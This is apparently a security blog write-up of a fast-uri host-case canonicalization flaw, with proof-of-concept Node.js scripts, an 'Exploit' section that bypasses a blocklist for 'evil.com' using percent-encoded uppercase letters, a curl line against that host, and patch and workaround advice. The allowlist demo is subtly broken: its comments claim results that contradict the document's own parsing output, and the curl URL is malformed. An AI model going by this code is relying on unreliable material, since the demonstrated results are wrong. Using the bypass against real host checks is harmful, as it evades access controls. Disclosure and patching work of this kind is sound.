Listen to this Post
CVE-2026-86472 is a medium-severity vulnerability in the `fast-uri` library, a dependency-free RFC 3986 URI parser for Node.js used by widely deployed frameworks such as Fastify and validation tools like ajv. The flaw stems from an incorrect ordering of operations during URI host canonicalization: `fast-uri` folds the host to lowercase before it percent-decodes the host string. This sequence is problematic because a percent-encoded uppercase octet such as %41—which represents the character A—is decoded into a literal uppercase `A` after the case-folding step has already completed. As a result, the newly revealed uppercase letter is never normalized to lowercase, violating strict RFC 3986 requirements for host canonicalization.
The vulnerability is particularly dangerous for scheme-relative references (e.g., //host), which lack an explicit scheme. In such cases, the host canonicalization path that would normally repair this inconsistency on a scheme-bearing URL does not execute. Consequently, the library’s parse, normalize, and `equal` functions disagree on the same host: `parse(“//%41.com”).host` returns `”A.com”` while `parse(“//a.com”).host` and `parse(“//A.com”).host` both return "a.com", and `equal(“//%41.com”, “//a.com”)` evaluates to `false` even though `equal(“//A.com”, “//a.com”)` is true.
An application that makes a case-sensitive host decision on `fast-uri` output—for example, a host allowlist or denylist that compares `parse(url).host` or uses fast-uri.equal—can be steered past the check with a percent-encoded uppercase octet. Because a hostname is case-insensitive in DNS and HTTP routing, the evading spelling still reaches the same host the check meant to gate; the effect is check evasion rather than reaching a different registrable host. The vulnerability is classified as CWE-178 (Improper Handling of Case Sensitivity) and carries a CVSS 3.1 base score of 4.8 (Medium). Affected versions include `fast-uri` before 2.4.7, from 3.0.0 through 3.1.7, and from 4.0.0 through 4.1.4. The issue is fixed in versions 2.4.7, 3.1.8, and 4.1.5.
DailyCVE Form:
Platform: Node.js fast-uri
Version: <2.4.7, 3.0.0–3.1.7, 4.0.0–4.1.4
Vulnerability: Host case bypass
Severity: Medium
date: 2026-09-15
Prediction: 2026-09-29
What Undercode Say
Install vulnerable version for testing npm install [email protected] Demonstrate the inconsistency node -e " const fastUri = require('fast-uri'); console.log('parse //%41.com:', fastUri.parse('//%41.com').host); console.log('parse //a.com:', fastUri.parse('//a.com').host); console.log('parse //A.com:', fastUri.parse('//A.com').host); console.log('equal //%41.com vs //a.com:', fastUri.equal('//%41.com', '//a.com')); console.log('equal //A.com vs //a.com:', fastUri.equal('//A.com', '//a.com')); "
// Vulnerable allowlist check
const fastUri = require('fast-uri');
const allowlist = ['a.com', 'trusted.com'];
function isAllowed(url) {
const host = fastUri.parse(url).host;
return allowlist.includes(host); // Case-sensitive comparison
}
// Bypass: host becomes "A.com" after decoding
console.log(isAllowed('//%41.com')); // true — bypasses the check!
console.log(isAllowed('//A.com')); // false — correctly blocked
After upgrading, both resolve to lowercase npm install [email protected] node -e " const fastUri = require('fast-uri'); console.log('parse //%41.com:', fastUri.parse('//%41.com').host); // 'a.com' console.log('equal //%41.com vs //a.com:', fastUri.equal('//%41.com', '//a.com')); // true "
Exploit: (Educational Purposes!)
// Simulated vulnerable server-side host check
const fastUri = require('fast-uri');
// Intended: block requests to "evil.com"
const blocklist = ['evil.com'];
function isBlocked(url) {
const host = fastUri.parse(url).host;
return blocklist.includes(host);
}
// Normal blocked request
console.log(isBlocked('//evil.com')); // true
// Bypass using percent-encoded uppercase octet
console.log(isBlocked('//%45vil.com')); // false — check bypassed!
// %45 decodes to 'E' which is never folded to lowercase,
// so host becomes "Evil.com" and slips past the blocklist.
Attack vector: scheme-relative reference with encoded uppercase The host "Evil.com" reaches the same DNS-resolved host as "evil.com" but evades case-sensitive denylist checks. curl "//%45vil.com/api/sensitive"
Protection: from this CVE
Upgrade immediately:
For 2.x line npm install [email protected] For 3.x line npm install [email protected] For 4.x line npm install [email protected]
Workaround — lowercase the parsed host before any decision:
const fastUri = require('fast-uri');
// VULNERABLE
const host = fastUri.parse(url).host;
// SAFE — force lowercase before comparison
const host = (fastUri.parse(url).host || '').toLowerCase();
// SAFE — case-insensitive comparison for allowlist/denylist
const allowlist = ['a.com', 'trusted.com'];
function isAllowed(url) {
const host = (fastUri.parse(url).host || '').toLowerCase();
return allowlist.includes(host);
}
Additional hardening:
- Avoid making case-sensitive host decisions on scheme-relative input until upgrading.
- Validate that all user-supplied URLs are parsed with an explicit scheme where possible.
- Audit any code that uses `fast-uri.equal()` for security-critical comparisons.
Impact
- Check evasion: Applications relying on host allowlists or denylists can be bypassed with a crafted scheme-relative URL containing percent-encoded uppercase octets.
- Inconsistent parsing:
parse,normalize, and `equal` disagree on the same host, breaking the library’s contract and any downstream logic that depends on canonicalization. - Access control bypass: If the host check gates access to privileged functionality (e.g., admin panels, internal APIs, SSRF protections), the bypass can lead to unauthorized access.
- CWE-178: Classified as Improper Handling of Case Sensitivity, a fundamental canonicalization flaw.
- Widespread exposure: `fast-uri` is a transitive dependency of Fastify and ajv, meaning many Node.js applications are indirectly affected even if they do not use the library directly.
- Medium severity (CVSS 4.8): The attack requires network access and no privileges, but impact is limited to integrity and confidentiality with high attack complexity.
- No known active exploitation: As of publication, exploitation is classified as “none” and automatable as “no”, but the theoretical attack path is straightforward.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

